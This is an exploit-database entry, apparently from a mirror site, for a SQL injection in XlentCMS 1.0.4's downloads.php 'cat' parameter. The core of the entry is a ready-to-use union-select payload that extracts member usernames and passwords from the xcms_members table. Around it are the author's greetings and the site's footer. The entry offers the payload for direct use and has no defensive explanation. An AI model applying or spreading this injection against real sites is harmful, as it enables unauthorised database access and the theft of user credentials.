[] NeoSense
E X P L O I T S
title author type platform port cve id

XlentCMS 1.0.4 - 'downloads.php?cat' SQL Injection

Author: Gamoscu
type: webapps
platform: php
port: 
date_added: 2009-12-31 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
 Script      : XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

 Script site : http://sphere.xlentprojects.se/portal.php

 AUTHOR      : Gamoscu

 HOME        : http://www.1923turk.biz

 Blog        : http://gamoscu.wordpress.com/

 Greetz      : Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/downloads.php?cat=[SQL]

Example:

1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members--


Vatan Lafla De�il Eylemle Sevilir

Kiskananlar catlasin Zorunuza Gitmesin
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.